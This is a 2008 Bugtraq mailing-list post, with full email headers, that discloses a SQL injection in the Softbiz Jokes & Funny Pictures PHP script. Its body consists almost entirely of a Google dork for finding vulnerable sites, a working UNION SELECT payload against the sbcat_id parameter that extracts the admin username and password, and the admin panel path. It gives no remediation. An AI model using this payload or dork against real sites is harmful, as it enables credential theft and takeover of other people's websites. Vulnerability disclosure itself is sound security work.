Softbiz jokes and funny pictures (index.php) sql injection
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Softbiz jokes and funny pictures (index.php) sql injection
- From: "Hamza Almersoumi" <xxmizoxx@xxxxxxxxx>
- Date: Sun, 24 Feb 2008 00:43:18 -0800
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=nqX/3s7V7dcu40FTRPxfNvLtS8mpz7yjmNgkNhm2iag=; b=rRPzUQtA8t1674qNFuE32LQ7ahisRchbTpsyxtvaLYDBhWWfNyJCcfTqsD3X+We44MoXjd1ko2mUyTeyZAenJ6uLczahTzEQUfxedbkinTI/BryCJioLXo76Nnm4uhXyzXAjjoHYsGFp2+Ln5LzrzBVWQr8j/GJUlaiT3azg0Jk=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=bOiT72I2wjUfeTVcVzuNK99QNHgquatyR7iFa4anLZt7uBVSrI68ZhSYezB+hJ9eqd5Wcol9nFSB/j+uW6jUfWyttgKq54KafXFPIeNwYKDBVr/LgHhToT/LNbiiger7anDMa0RjCNiADijEDWyolauDtRYDhiUZSPaebSjXKGY=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Script:Softbiz jokes & funny pictures
Author:-=Mizo=-
Dork:inurl:/index.php?sbcat_id=
Exploit:/index.php?sbcat_id=-1 union select
0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from
sbjks_admin/*
Admin cpanel:/path/admin
Greetz: L!0n - Red_casper - SoSo H H - DC - Iraqi_strike - Crack_man -
B0rizQ - Mahmood_ali - Net^Virus - iraqi_strike and all my friends!!